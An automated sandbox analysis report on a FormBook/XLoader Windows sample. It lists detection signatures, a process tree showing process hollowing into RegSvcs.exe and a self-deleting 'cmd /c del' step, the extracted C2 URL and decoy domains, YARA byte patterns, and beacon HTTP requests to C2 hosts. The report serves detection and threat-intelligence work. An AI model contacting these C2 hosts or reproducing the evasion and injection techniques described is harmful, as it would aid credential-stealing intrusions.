Loading ...

Play interactive tourEdit tour

Windows Analysis Report TPJX2QwEdXs5sTV.exe

Overview

General Information

Sample Name:TPJX2QwEdXs5sTV.exe
Analysis ID:483640
MD5:ce556ce97ea23cbc2940f2aad45d468f
SHA1:cc2bdaefa2f0ac108e2f456e42a42e8258580cf4
SHA256:7c3d5ebd2c417a52b2a0b98dee95b5a7f283816f6a2453ceeffd31becc140882
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TPJX2QwEdXs5sTV.exe (PID: 5056 cmdline: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe' MD5: CE556CE97EA23CBC2940F2AAD45D468F)
    • RegSvcs.exe (PID: 5192 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
    • RegSvcs.exe (PID: 4036 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cmd.exe (PID: 3608 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • cmd.exe (PID: 4572 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.438451.com/t75f/"], "decoy": ["ice-lemon.pro", "ar3spro.cloud", "9055837.com", "fucksociety.net", "prettyofficialx.com", "mfxw.xyz", "relationshipquiz.info", "customia.xyz", "juanayjuan.com", "zidiankj.com", "facture-booking.com", "secondmining.store", "aboutyou.club", "gongxichen.com", "laurabraincreative.com", "pierrot-bros.com", "saintpaulaccountingservices.com", "dom-maya.com", "garderobamarzen.net", "la-salamandre-assurances.com", "pearmanprep.com", "telfarcontrol.com", "productsshareco.com", "cirf2021.online", "purchasevip.com", "cakewalkvision.com", "pointrenewables.com", "groups4n.com", "swnegce.xyz", "tjapro.com", "packagedesign.biz", "services-govgr.cloud", "shopgrassfedbeef.com", "tquilaint.com", "templetreemontessori.com", "munortiete.com", "nothingbutspotlesss.com", "fanpaixiu.xyz", "fr-site-amazon.com", "salartfinance.com", "beachers-shop.com", "friskvardaportalen.online", "pinsanova.site", "lemonvinyl.online", "indianadogeavaxsite.site", "styphon.com", "open24review-service.com", "bdjh9.xyz", "cocodiesel.com", "fortmyersfl.deals", "dsdtourism.com", "phone-il.net", "learningfactoryus.com", "incentreward.xyz", "travellerfund.com", "changcheng.pro", "cryptowalletts.com", "tradopplst.xyz", "autonomoustechnologyinc.com", "assessmentdna.xyz", "denicon-th.com", "dib5so.com", "genwealthbuilders.store", "delnetitcilo.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x4695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x4181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x4797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x33fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ab9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bcc:$sqlite3step: 68 34 1C 7B E1
    • 0x6ae8:$sqlite3text: 68 38 2A 90 C5
    • 0x6c0d:$sqlite3text: 68 38 2A 90 C5
    • 0x6afb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c23:$sqlite3blob: 68 53 D8 7F 8C
    00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cb9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dcc:$sqlite3step: 68 34 1C 7B E1
        • 0x15ce8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e0d:$sqlite3text: 68 38 2A 90 C5
        • 0x15cfb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e23:$sqlite3blob: 68 53 D8 7F 8C
        1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x68418:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x687a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x744b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x73fa1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x745b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x7472f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x691ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x7321c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x69f32:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x799a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x7aa4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 4 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe' , ParentImage: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe, ParentProcessId: 5056, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5192
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe' , ParentImage: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe, ParentProcessId: 5056, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5192

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.438451.com/t75f/"], "decoy": ["ice-lemon.pro", "ar3spro.cloud", "9055837.com", "fucksociety.net", "prettyofficialx.com", "mfxw.xyz", "relationshipquiz.info", "customia.xyz", "juanayjuan.com", "zidiankj.com", "facture-booking.com", "secondmining.store", "aboutyou.club", "gongxichen.com", "laurabraincreative.com", "pierrot-bros.com", "saintpaulaccountingservices.com", "dom-maya.com", "garderobamarzen.net", "la-salamandre-assurances.com", "pearmanprep.com", "telfarcontrol.com", "productsshareco.com", "cirf2021.online", "purchasevip.com", "cakewalkvision.com", "pointrenewables.com", "groups4n.com", "swnegce.xyz", "tjapro.com", "packagedesign.biz", "services-govgr.cloud", "shopgrassfedbeef.com", "tquilaint.com", "templetreemontessori.com", "munortiete.com", "nothingbutspotlesss.com", "fanpaixiu.xyz", "fr-site-amazon.com", "salartfinance.com", "beachers-shop.com", "friskvardaportalen.online", "pinsanova.site", "lemonvinyl.online", "indianadogeavaxsite.site", "styphon.com", "open24review-service.com", "bdjh9.xyz", "cocodiesel.com", "fortmyersfl.deals", "dsdtourism.com", "phone-il.net", "learningfactoryus.com", "incentreward.xyz", "travellerfund.com", "changcheng.pro", "cryptowalletts.com", "tradopplst.xyz", "autonomoustechnologyinc.com", "assessmentdna.xyz", "denicon-th.com", "dib5so.com", "genwealthbuilders.store", "delnetitcilo.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: TPJX2QwEdXs5sTV.exeReversingLabs: Detection: 17%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY
          Source: 6.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: RegSvcs.pdb, source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.390723041.000000000105F000.00000040.00000001.sdmp, cmd.exe, 00000017.00000002.518459422.000000000369F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe, 00000017.00000002.511566191.0000000000870000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmd.exe
          Source: Binary string: RegSvcs.pdb source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
          Source: Binary string: cmd.pdb source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008868BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0088245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008931DC FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008785EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.ice-lemon.pro
          Source: C:\Windows\explorer.exeDomain query: www.indianadogeavaxsite.site
          Source: C:\Windows\explorer.exeDomain query: www.munortiete.com
          Source: C:\Windows\explorer.exeDomain query: www.pierrot-bros.com
          Source: C:\Windows\explorer.exeNetwork Connect: 54.194.41.141 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.147.111 80
          Performs DNS queries to domains with low reputationShow sources
          Source: DNS query: www.fanpaixiu.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.438451.com/t75f/
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.indianadogeavaxsite.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.munortiete.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.247036337.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://en.w
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.246382239.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.246270583.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.comj
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.253864499.0000000006043000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlh
          Source: explorer.exe, 00000008.00000000.308790689.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252313565.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com)
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com-se
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com0
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252560675.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com?
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252833728.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comMic
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTCd
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coma
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252394694.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comak
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252349501.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comd
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252876215.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comexc
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.252434713.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml-g
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252560675.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml-se
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como._
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252225171.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comof
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252225171.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comona
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comue
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252876215.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comypoC
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.257664415.0000000006041000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.257568508.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.256412762.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.256690000.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/0
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.258643842.000000000605E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.258643842.000000000605E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlo
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.258314127.000000000605E000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.258167734.0000000006041000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.258749887.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers0.
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.258749887.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers3
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.259100620.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersD
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.256499107.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersH
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251297242.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn(
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251510361.0000000006040000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn0
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cncom
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnicr
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.262778713.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.260576945.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.250819017.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kX
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.250685229.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr-cY
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.250819017.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krV
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.260424917.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.245363117.0000000006022000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.245363117.0000000006022000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comt
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
